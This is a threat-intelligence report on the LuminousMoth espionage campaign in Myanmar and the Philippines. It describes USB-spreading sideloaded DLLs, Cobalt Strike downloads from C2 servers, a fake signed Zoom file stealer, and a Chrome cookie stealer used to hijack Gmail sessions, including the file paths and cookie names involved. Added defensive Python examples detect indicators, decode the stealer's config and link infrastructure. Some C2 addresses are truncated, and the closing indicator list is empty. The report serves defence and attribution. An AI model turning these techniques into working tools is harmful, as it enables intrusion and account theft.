Most notably though, we observed the capability of the culprit to spread to other hosts through the use of USB drives. In some cases, this was followed by deployment of a signed, but fake version of the popular application Zoom, which was in fact malware enabling the attackers to exfiltrate files from the compromised systems. The sheer volume of the attacks raises the question of whether this is caused by a rapid replication through removable devices or by an unknown infection vector, such as a watering hole or a supply chain attack.

In this publication we aim to profile LuminousMoth as a separate entity, outlining the infection chain and unique toolset it leverages, the scale and targeting in its campaigns as well as its connections to HoneyMyte through common TTPs and shared resources.

What were the origins of the infections?

We identified two infection vectors used by LuminousMoth: the first one provides the attackers with initial access to a system. It consists of sending a spear-phishing email to the victim containing a Dropbox download link. The link leads to a RAR archive that masquerades as a Word document by setting the “file_subpath” parameter to point to a filename with a .DOCX extension.

hxxps://www.dropbox[.]com/s/esh1ywo9irbexvd/COVID-19%20Case%2012-11-2020.rar?dl=0&file_subpath=%2FCOVID-19+Case+12-11-2020%2FCOVID-19+Case+12-11-2020(2).docx

The archive contains two malicious DLL libraries as well as two legitimate executables that sideload the DLL files. We found multiple archives like this with file names of government entities in Myanmar, for example “COVID-19 Case 12-11-2020(MOTC).rar” or “DACU Projects.r01” (MOTC is Myanmar’s Ministry of Transport and Communications, and DACU refers to the Development Assistance Coordination Unit of the Foreign Economic Relations Department (FERD) in Myanmar).

Infection chain

The second infection vector comes into play after the first one has successfully finished, whereby the malware tries to spread by infecting removable USB drives. This is made possible through the use of two components: the first is a malicious library called “version.dll” that gets sideloaded by “igfxem.exe”, a Microsoft Silverlight executable originally named “sllauncher.exe”. The second is “wwlib.dll”, another malicious library sideloaded by the legitimate binary of “winword.exe”. The purpose of “version.dll” is to spread to removable devices, while the purpose of “wwlib.dll” is to download a Cobalt Strike beacon.

The first malicious library “version.dll” has three execution branches, chosen depending on the provided arguments, which are: “assist”, “system” or no argument. If the provided argument is “assist”, the malware creates an event called “nfvlqfnlqwnlf” to avoid multiple executions and runs “winword.exe” in order to sideload the next stage (“wwlib.dll”). Afterwards, it modifies the registry by adding an “Opera Browser Assistant” entry as a run key, thus achieving persistence and executing the malware with the “assist” parameter upon system startup.

Registry value to run the malware at system startup

Then, the malware checks if there are any removable drives connected to the infected system. If any are found, it enumerates the files stored on the drive and saves the list to a file called “udisk.log”. Lastly, the malware is executed once again with the “system” parameter.

If the provided argument is “system”, a different event named “qjlfqwle21ljl” is created. The purpose of this execution branch is to deploy the malware on all connected removable devices, such as USB sticks or external drives. If a drive is found, the malware creates hidden directories carrying non-ASCII characters on the drive and moves all the victim’s files there, in addition to the two malicious libraries and legitimate executables. The malware then renames the file “igfxem.exe” to “USB Driver.exe” and places it at the root of the drive along with “version.dll”. As a result, the victims are no longer able to view their own drive files and are left with only “USB Driver.exe”, meaning they will likely execute the malware to regain access to the hidden files.

Copying the payload and creating a hidden directory on the removable drive

If no argument is provided, the malware executes the third execution branch. This branch is only launched in the context of a compromised removable drive by double-clicking “USB Driver.exe”. The malware first copies the four LuminousMoth samples stored from the hidden drive repository to “C:\Users\Public\Documents\Shared Virtual Machines\”. Secondly, the malware executes “igfxem.exe” with the “assist” argument. Finally, “explorer.exe” gets executed to display the hidden files that were located on the drive before the compromise, and the user is able to view them.

The second library, “wwlib.dll”, is a loader. It gets sideloaded by “winword.exe” and emerged two months prior to “version.dll”, suggesting that earlier instances of the attack did not rely on replication through removable drives but were probably distributed using other methods such as the spear-phishing emails we observed.

“Wwlib.dll” fetches a payload by sending a GET request to the C2 address at “103.15.28[.]195”. The payload is a Cobalt Strike beacon that uses the Gmail malleable profile to blend with benign traffic.

Downloading a Cobalt Strike beacon from 103.15.28[.]195

Older spreading mechanism

We discovered an older version of the LuminousMoth infection chain that was used briefly before the introduction of “version.dll”. Instead of the usual combination of “version.dll” and “wwlib.dll”, a different library called “wwlib.dll” is in fact the first loader in this variant and is in charge of spreading to removable drives, while a second “DkAr.dll” library is in charge of downloading a Cobalt Strike beacon from the C2 server. This variant’s “wwlib.dll” offers two execution branches: one triggered by the argument “Assistant” and a second one with no arguments given. When this library is sideloaded by “winword.exe”, it creates an event called “fjsakljflwqlqewq”, adds a registry value for persistence, and runs “PrvDisk.exe” that then sideloads “DkAr.dll”.

The final step taken by “wwlib.dll” is to copy itself to any removable USB device. To do so, the malware checks if there are any files carrying a .DOC or .DOCX extension stored on the connected devices. If such a document is found, the malware replaces it with the “winword.exe” binary, keeping the document’s file name but appending “.exe” to the end. The original document is then moved to a hidden directory. The “wwlib.dll” library is copied to the same directory containing the fake document and the four samples (two legitimate PE files, two DLL libraries) are copied to “[USB_Drive letter]:\System Volume Information\en-AU\Qantas”.

If the malware gets executed without the “Assistant” argument, this means the execution was started from a compromised USB drive by double-clicking on the executable. In this case, the malware first executes “explorer.exe” to show the hidden directory with the original documents of the victim, and proceeds to copy the four LuminousMoth samples to “C:\Users\Public\Documents\Shared Virtual Machines\”. Finally, it executes “winword.exe” with the “Assistant” argument to infect the new host, to which the USB drive was connected.

Since this variant relies on replacing Word documents with an executable, it is possible that the attackers chose the “winword.exe” binary for sideloading the malicious DLL due to its icon, which raises less suspicions about the original documents being tampered with. However, this means that the infection was limited only to USB drives that have Word documents stored on them, and might explain the quick move to a more pervasive approach that infects drives regardless of their content.
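Both spreading mechanisms described above leave host-level artifacts that can be checked without any signature of the binaries themselves: the “Opera Browser Assistant” run key and the “assist” argument, the named events, the “C:\Users\Public\Documents\Shared Virtual Machines\” staging directory, “udisk.log”, the sideloading pairs (igfxem.exe with version.dll, winword.exe with wwlib.dll, PrvDisk.exe with DkAr.dll), a removable drive whose root holds only “USB Driver.exe” and “version.dll” next to hidden non-ASCII directories, Word documents replaced by an executable of the same name plus “.exe”, and connections to 103.15.28[.]195. The following added example (not Kaspersky's code) runs those checks over a host snapshot; the snapshot layout and the sample values in it are constructed for this example, only the indicators come from the report.

```python
from pathlib import PureWindowsPath

# Indicators quoted from the report; everything else here is an assumption.
KNOWN_EVENTS = {"nfvlqfnlqwnlf", "qjlfqwle21ljl", "fjsakljflwqlqewq"}
RUN_KEY_NAME = "Opera Browser Assistant"
STAGING_DIR = r"C:\Users\Public\Documents\Shared Virtual Machines"
C2_IP = "103.15.28.195"
SIDELOAD_PAIRS = (("igfxem.exe", "version.dll"),
                  ("winword.exe", "wwlib.dll"),
                  ("prvdisk.exe", "dkar.dll"))

# Constructed host snapshot (assumed layout): run keys, named kernel objects,
# file listing, removable-drive root entries and live connections.
SAMPLE_SNAPSHOT = {
    "run_keys": {
        "Opera Browser Assistant": STAGING_DIR + r"\igfxem.exe assist",
        "OneDrive": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
    },
    "named_events": ["Global\\nfvlqfnlqwnlf", "MSCTF.Shared.MUTEX"],
    "files": [
        STAGING_DIR + r"\igfxem.exe", STAGING_DIR + r"\version.dll",
        STAGING_DIR + r"\winword.exe", STAGING_DIR + r"\wwlib.dll",
        STAGING_DIR + r"\udisk.log",
        r"C:\Program Files\Microsoft Office\root\Office16\winword.exe",
    ],
    "removable_roots": {
        "E:": ["USB Driver.exe", "version.dll", "\u00a0"],          # current variant
        "F:": ["Report.docx.exe", "System Volume Information"],     # older variant
    },
    "connections": [("10.0.0.5", C2_IP, 80), ("10.0.0.5", "192.0.2.10", 443)],
}


def check_snapshot(snap):
    """Return (indicator_kind, detail) pairs for every LuminousMoth artifact found."""
    hits = []
    for name, cmd in snap.get("run_keys", {}).items():
        if name == RUN_KEY_NAME or cmd.lower().endswith(" assist"):
            hits.append(("run_key", f"{name} -> {cmd}"))
    for ev in snap.get("named_events", []):
        if ev.rsplit("\\", 1)[-1] in KNOWN_EVENTS:
            hits.append(("named_event", ev))

    by_dir = {}  # directory -> set of lower-cased file names, to spot sideload pairs
    for f in snap.get("files", []):
        p = PureWindowsPath(f)
        by_dir.setdefault(str(p.parent).lower(), set()).add(p.name.lower())
        if p.name.lower() == "udisk.log":
            hits.append(("udisk_log", f))
    for d, names in by_dir.items():
        if d == STAGING_DIR.lower():
            hits.append(("staging_dir", d))
        for exe, dll in SIDELOAD_PAIRS:
            if exe in names and dll in names:
                hits.append(("sideload_pair", f"{d}\\{exe} + {dll}"))

    for drive, entries in snap.get("removable_roots", {}).items():
        lower = {e.lower() for e in entries}
        if "usb driver.exe" in lower and "version.dll" in lower:
            hits.append(("usb_lure", drive))
        if any(not e.isascii() for e in entries):
            hits.append(("non_ascii_root_entry", drive))
        if any(e.lower().endswith((".doc.exe", ".docx.exe")) for e in entries):
            hits.append(("doc_exe_lure", drive))

    for src, dst, port in snap.get("connections", []):
        if dst == C2_IP:
            hits.append(("c2_connection", f"{src} -> {dst}:{port}"))
    return hits


if __name__ == "__main__":
    for kind, detail in check_snapshot(SAMPLE_SNAPSHOT):
        print(f"{kind:22} {detail}")
```

The legitimate Office winword.exe is not flagged because wwlib.dll is only suspicious when it sits next to a winword.exe outside the Office installation; the pair check is what separates the sideloading setup from the real application.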

Post exploitation tool: Fake Zoom application

The attackers deployed an additional malicious tool on some of the infected systems in Myanmar. Its purpose is to scan the infected systems for files with predefined extensions and exfiltrate them to a C2 server. Interestingly, this stealer impersonates the popular Zoom video telephony software. One measure to make it seem benign is a valid digital signature provided with the binary along with a certificate that is owned by Founder Technology, a subsidiary of Peking University’s Founder Group, located in Shanghai.

Valid certificate of the fake Zoom application

To facilitate the exfiltration of data, the stealer parses a configuration file called “zVideoUpdate.ini”. While it is unclear how the malware is written to disk by the attackers, it is vital that the .ini file is dropped alongside it and placed in the same directory in order to work. The configuration parameters that comprise this file are as follows:

  • meeting: Undetermined integer value that defaults to 60.
  • ssb_sdk: Undetermined integer value that defaults to 60.
  • zAutoUpdate: URL of the C2 server which the stolen data will be uploaded to.
  • XmppDll: Path to the utility used to archive exfiltrated files.
  • zKBCrypto: List of exfiltrated file extensions that are searched in target directories. The extensions of interest are delimited with the ‘;’ character.
  • zCrashReport: Suffix string appended to the name of the staging directory used to host exfiltrated files before they are archived.
  • zWebService: Path prefix for the exfiltration staging directory.
  • zzhost: Path to the file that will hold a list of hashes corresponding to the files collected for exfiltration.
  • ArgName: AES key for configuration string encryption.
  • Version: AES IV for configuration string encryption.
  • zDocConverter: Path #1 to a directory to look for files with the extensions intended for exfiltration.
  • zTscoder: Path #2 to a directory to look for files with the extensions intended for exfiltration.
  • zOutLookIMutil: Path #3 to a directory to look for files with the extensions intended for exfiltration.

Each field in the configuration file (with the exception of Version, ArgName and zCrashReport) is encoded with Base64. While the authors incorporated logic and parameters that allow the decryption of some of the fields specified above with the AES algorithm, it remains unused.

The stealer uses the parameters in order to scan the three specified directories (along with root paths of fixed and removable drives) and search for files with the extensions given in the zKBCrypto parameter. Matching files will then be copied to a staging directory created by the malware in a path constructed with the following structure: “<zWebService>\%Y-%m-%d %H-%M-%S<zCrashReport>”. The string format in the directory’s name represents the time and date of the malware’s execution.

In addition, the malware collects the metadata of the stolen files. A list of the original paths of the exfiltrated files is written to a file named ‘VideoCoingLog.txt’, which resides in the aforementioned staging directory. Likewise, a second file holds the list of hashes corresponding to the exfiltrated files and is placed in the path specified in the zzhost parameter.

After collection of the targeted files and their metadata, the malware executes an external utility in order to archive the staging directory into a .rar file that will be placed in the path specified in the zWebService parameter. The malware assumes the existence of the utility in a path specified under the XmppDll parameter, suggesting the attackers have prior knowledge of the infected system and its pre-installed applications.

Finally, the malware seeks all files with a .rar extension within the zWebService directory that should be transmitted to the C2. The method used to send the archive makes use of a statically linked CURL library, which sets the parameters specified below when conducting the transaction to the server. The address of the C2 is taken from the zAutoUpdate parameter.
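For an analyst, the useful part of the description above is the configuration file: decoding a recovered “zVideoUpdate.ini” yields the C2 URL, the archiver path, the staging directory and the targeted extensions without running anything. The following added example (not Kaspersky's code or the attackers' code) decodes the Base64 fields as described (Version, ArgName and zCrashReport are left in plaintext), derives the staging directory name from the “<zWebService>\%Y-%m-%d %H-%M-%S<zCrashReport>” pattern so it can be hunted for, and answers whether a given file would be selected by the stealer's scan. The section name, the sample values and the assumption that the file is plain INI syntax are constructed for this example; the field names are the ones in the report.

```python
import base64
import configparser
from datetime import datetime
from pathlib import PureWindowsPath

# Fields the report describes as not Base64-encoded.
PLAINTEXT_FIELDS = {"Version", "ArgName", "zCrashReport"}


def _b64(s):
    return base64.b64encode(s.encode()).decode()


# Constructed sample values (invented; no real C2 or victim paths).
RAW_FIELDS = {
    "meeting": "60", "ssb_sdk": "60",
    "zAutoUpdate": "http://c2.example.invalid/upload",
    "XmppDll": r"C:\Program Files\WinRAR\Rar.exe",
    "zKBCrypto": ".doc;.docx;.xls;.pdf",
    "zCrashReport": "_zoom",
    "zWebService": r"C:\Users\Public\Videos",
    "zzhost": r"C:\Users\Public\Videos\hash.log",
    "ArgName": "0" * 32, "Version": "0" * 16,
    "zDocConverter": r"C:\Users\alice\Documents",
    "zTscoder": r"C:\Users\alice\Desktop",
    "zOutLookIMutil": r"D:\Share",
}


def render_sample_ini(fields=RAW_FIELDS):
    """Build an INI file in the encoded form the stealer expects ([zoom] section is assumed)."""
    lines = ["[zoom]"]
    for k, v in fields.items():
        lines.append(f"{k} = {v if k in PLAINTEXT_FIELDS else _b64(v)}")
    return "\n".join(lines) + "\n"


def parse_config(text):
    """Decode every field except the plaintext ones; keys keep their case."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str
    cp.read_string(text)
    section = cp.sections()[0]
    return {k: (v if k in PLAINTEXT_FIELDS else base64.b64decode(v).decode())
            for k, v in cp.items(section)}


def staging_directory(cfg, when):
    """Staging directory the stealer would create at time `when` ('YYYY-MM-DD HH:MM:SS')."""
    ts = datetime.strptime(when, "%Y-%m-%d %H:%M:%S").strftime("%Y-%m-%d %H-%M-%S")
    return str(PureWindowsPath(cfg["zWebService"]) / (ts + cfg["zCrashReport"]))


def would_collect(cfg, path, drive_roots=("C:\\", "D:\\")):
    """True if `path` matches a zKBCrypto extension and sits directly in one of the
    three configured directories or at a drive root (the scan is not recursive
    per the report's description)."""
    p = PureWindowsPath(path)
    exts = {e.lower() for e in cfg["zKBCrypto"].split(";") if e}
    if p.suffix.lower() not in exts:
        return False
    parents = {str(PureWindowsPath(cfg[k])).lower()
               for k in ("zDocConverter", "zTscoder", "zOutLookIMutil")}
    parents |= {str(PureWindowsPath(r)).lower() for r in drive_roots}
    return str(p.parent).lower() in parents


if __name__ == "__main__":
    cfg = parse_config(render_sample_ini())
    print("C2:", cfg["zAutoUpdate"])
    print("archiver:", cfg["XmppDll"])
    print("staging dir:", staging_directory(cfg, "2021-07-14 09:05:00"))
```

The decoded zWebService plus the zCrashReport suffix gives a directory-name pattern (timestamp followed by the suffix) and a .rar archive location that can be hunted for on other hosts, and zzhost and the fixed ‘VideoCoingLog.txt’ name give two more file artifacts to search for.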

CURL logic used to issue the archive of exfiltrated files to the C&C

Post exploitation tool: Chrome Cookies Stealer

The attackers deployed another tool on some infected systems that steals cookies from the Chrome browser. This tool requires the local username as an argument, as it is needed to access two files containing the data to be stolen:

C:\Users\[USERNAME]\AppData\Local\Google\Chrome\User Data\Default\Cookies
C:\Users\[USERNAME]\AppData\Local\Google\Chrome\User Data\Local State

The stealer starts by extracting the encrypted_key value stored in the “Local State” file. This key is base64 encoded and used to decode the cookies stored in the “Cookies” file. The stealer uses the CryptUnprotectData API function to decrypt the cookies and looks for eight specific cookie values: SID, OSID, HSID, SSID, LSID, APISID, SAPISID and ACCOUNT_CHOOSER:

Cookie values the stealer looks for

Once found, the malware simply displays the values of those cookies in the terminal. The Google policy available here explains that these cookies are used to authenticate users:

Google policy explaining the purpose of the cookies

During our test, we set up a Gmail account and were able to duplicate our Gmail session by using the stolen cookies. We can therefore conclude this post exploitation tool is dedicated to hijacking and impersonating the Gmail sessions of the targets.

Command and Control

For C2 communication, some of the LuminousMoth samples contacted IP addresses directly, whereas others communicated with the domain “updatecatalogs.com”.

  • 15.28[.]195
  • 59.10[.]253

Infrastructure ties from those C2 servers helped reveal additional domains related to this attack that impersonate known news outlets in Myanmar, such as MMTimes, 7Day News and The Irrawaddy. Another domain “mopfi-ferd[.]com” also impersonated the Foreign Economic Relations Department (FERD) of the Ministry of Planning, Finance and Industry (MOPFI) in Myanmar.

  • mmtimes[.]net
  • mmtimes[.]org
  • 7daydai1y[.]com
  • irrawddy[.]com
  • mopfi-ferd[.]com

“Mopfi-ferd[.]com” resolved to an IP address that was associated with a domain masquerading as the Zoom API. Since we have seen the attackers deploying a fake Zoom application, it is possible this look-alike domain was used to hide malicious Zoom traffic, although we have no evidence of this.

Potentially related Zoom look-alike domains
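A defender-side check for the typosquats listed above, added here as an example and not part of Kaspersky's report: it normalises digit-for-letter swaps and compares the registrable label of each candidate against a watchlist of legitimate domains (the WATCHLIST entries are assumed for the example; the candidates are the report's domains).

```python
"""Flag look-alike domains against a watchlist of legitimate sites.
Added example, not Kaspersky's code; WATCHLIST entries are an assumption."""

# Digits commonly swapped for letters in typosquats; applied to both sides.
HOMOGLYPHS = str.maketrans({"1": "l", "0": "o", "5": "s"})

def levenshtein(a, b):
    """Classic edit distance (insert/delete/substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def refang(domain):
    # 'mmtimes[.]net' -> 'mmtimes.net'
    return domain.replace("[.]", ".").strip().lower()

def registrable_label(domain):
    # 'webmail.mmtimes.net' -> 'mmtimes'
    parts = refang(domain).split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]

def lookalike_matches(candidate, watchlist):
    """Return [(legit_domain, distance)] for watchlist entries the candidate mimics."""
    plain = refang(candidate)
    label = registrable_label(candidate).translate(HOMOGLYPHS)
    hits = []
    for legit in watchlist:
        if plain == legit or plain.endswith("." + legit):
            continue  # the real site or one of its own subdomains
        legit_label = registrable_label(legit).translate(HOMOGLYPHS)
        distance = levenshtein(label, legit_label)
        if distance <= max(1, len(legit_label) // 4):  # ~1 edit per 4 chars
            hits.append((legit, distance))
    return hits

def scan(candidates, watchlist):
    """Map each suspicious candidate to the legitimate domains it resembles."""
    report = {}
    for candidate in candidates:
        hits = lookalike_matches(candidate, watchlist)
        if hits:
            report[candidate] = hits
    return report

WATCHLIST = ["mmtimes.com", "7daydaily.com", "irrawaddy.com"]  # assumed legitimate
CANDIDATES = ["mmtimes[.]net", "mmtimes[.]org", "7daydai1y[.]com", "irrawddy[.]com",
              "mopfi-ferd[.]com", "updatecatalogs[.]com", "www.mmtimes.com"]

if __name__ == "__main__":
    for domain, hits in scan(CANDIDATES, WATCHLIST).items():
        print(domain, "->", hits)
```

Domains such as mopfi-ferd[.]com, which impersonate an organisation rather than a spelling, are not caught by edit distance and need a keyword or brand watchlist instead.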

Who were the targets?

We were able to identify a large number of targets infected by LuminousMoth, almost all of which are from the Philippines and Myanmar. We came across approximately 100 victims in Myanmar, whereas in the Philippines the number was much higher, counting nearly 1,400 victims. It seems, however, that the actual targets were only a subset of these that included high-profile organizations, namely government entities located both within those countries and abroad.

It is likely that the high rate of infections is due to the nature of the LuminousMoth attack and its spreading mechanism, as the malware propagates by copying itself to removable drives connected to the system. Nevertheless, the noticeable disparity between the extent of this activity in the two countries might hint at an additional, unknown infection vector being used solely in the Philippines. It could, however, simply be that the attackers are more interested in going after targets from this region.

Connections to HoneyMyte

Over the course of our analysis, we noticed that LuminousMoth shares multiple similarities with the HoneyMyte threat group. Both groups have been covered extensively in our private reports, and further details and analysis of their activity are available to customers of our private APT reporting service. For more information, contact: intelreports@kaspersky.com.

LuminousMoth and HoneyMyte have similar targeting and TTPs, such as the usage of DLL side-loading and Cobalt Strike loaders, and a similar component to LuminousMoth’s Chrome cookie stealer was also seen in previous HoneyMyte activity. Lastly, we found infrastructure overlaps between the C2 servers used in the LuminousMoth campaign and an older one that has been attributed to HoneyMyte.

Some of LuminousMoth’s malicious artifacts communicate with “updatecatalogs[.]com”, which resolves to the same IP address behind “webmail.mmtimes[.]net”. This domain was observed in a campaign that dates back to early 2020, and was even found on some of the systems that were later infected with LuminousMoth. In this campaign, a legitimate binary (“FmtOptions.exe”) sideloads a malicious DLL called “FmtOptions.dll”, which then decodes and executes the contents of the file “work.dat”. This infection flow also involves a service called “yerodns.dll” that implements the same functionality as “FmtOptions.dll”.

The domain “webmail.mmtimes[.]net” previously resolved to the IP “45.204.9[.]70”. This address is associated with another MMTimes look-alike domain used in a HoneyMyte campaign during 2020: “mmtimes[.]org”. In this case, the legitimate executable “mcf.exe” loads “mcutil.dll”. The purpose of “mcutil.dll” is to decode and execute “mfc.ep”, a PlugX backdoor that communicates with “mmtimes[.]org”. Parts of this campaign were also covered in one of our private reports discussing HoneyMyte’s usage of a watering hole to infect its victims.

Therefore, based on the above findings, we can assess with medium to high confidence that the LuminousMoth activity is indeed connected to HoneyMyte.

Connection between HoneyMyte and LuminousMoth C2s
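The infrastructure pivot described above (updatecatalogs[.]com sharing an IP with webmail.mmtimes[.]net, which earlier resolved to 45.204.9[.]70 alongside mmtimes[.]org), reproduced as an added example rather than Kaspersky's tooling: the passive-DNS records are constructed from the report, and 192.0.2.10 is a placeholder for the shared IP the report does not name.

```python
"""Pivot over passive-DNS resolutions to link two indicator sets.
Added example, not Kaspersky's code. 192.0.2.10 is a placeholder IP."""
from collections import defaultdict, deque

# Constructed passive-DNS records (domain, ip), built from the report's text.
RESOLUTIONS = [
    ("updatecatalogs.com", "192.0.2.10"),      # placeholder for the shared IP
    ("webmail.mmtimes.net", "192.0.2.10"),
    ("webmail.mmtimes.net", "45.204.9.70"),    # historical resolution
    ("mmtimes.org", "45.204.9.70"),
    ("unrelated.example", "198.51.100.5"),     # noise that must not link
]

MAX_FANOUT = 20  # IPs hosting more domains than this are shared hosting/CDN noise

def build_graph(resolutions, max_fanout=MAX_FANOUT):
    """Undirected bipartite graph of domains and IPs, dropping crowded IPs."""
    per_ip = defaultdict(set)
    for domain, ip in resolutions:
        per_ip[ip].add(domain)
    graph = defaultdict(set)
    for ip, domains in per_ip.items():
        if len(domains) > max_fanout:
            continue  # a crowded IP is not evidence of a shared operator
        for domain in domains:
            graph[domain].add(ip)
            graph[ip].add(domain)
    return graph

def pivot_path(graph, start, goal):
    """Shortest chain of domain/IP hops from start to goal, or None."""
    prev = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            path = []
            while node is not None:
                path.append(node)
                node = prev[node]
            return path[::-1]
        for nxt in sorted(graph.get(node, ())):
            if nxt not in prev:
                prev[nxt] = node
                queue.append(nxt)
    return None

def overlaps(graph, set_a, set_b):
    """(a, b, path) for every indicator of set_a that reaches one of set_b."""
    return [(a, b, pivot_path(graph, a, b)) for a in set_a for b in set_b
            if pivot_path(graph, a, b)]

if __name__ == "__main__":
    for a, b, path in overlaps(build_graph(RESOLUTIONS), ["updatecatalogs.com"], ["mmtimes.org"]):
        print(a, "->", b, ":", " -> ".join(path))
```

Each hop in the returned path is a resolution a reviewer can verify independently, which is what turns a shared IP into an attribution argument rather than a coincidence.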


LuminousMoth represents a formerly unknown cluster of activity that is affiliated with a Chinese-speaking actor. As described in this report, there are multiple overlaps between resources used by LuminousMoth and those sighted in previous activity of HoneyMyte. Both groups, whether related or not, have conducted activity of the same nature – large-scale attacks that affect a wide perimeter of targets with the aim of hitting a few that are of interest.

On the same note, this group’s activity and the apparent connections may hint at a wider phenomenon observed during 2021 among Chinese-speaking actors, whereby many are re-tooling and producing new and unknown malware implants. This allows them to obscure any ties to their former activities and blur their attribution to known groups. With this challenge in mind, we continue to track the activity described in this publication with an eye to understanding its evolution and connection to previous attacks.

Indicators of Compromise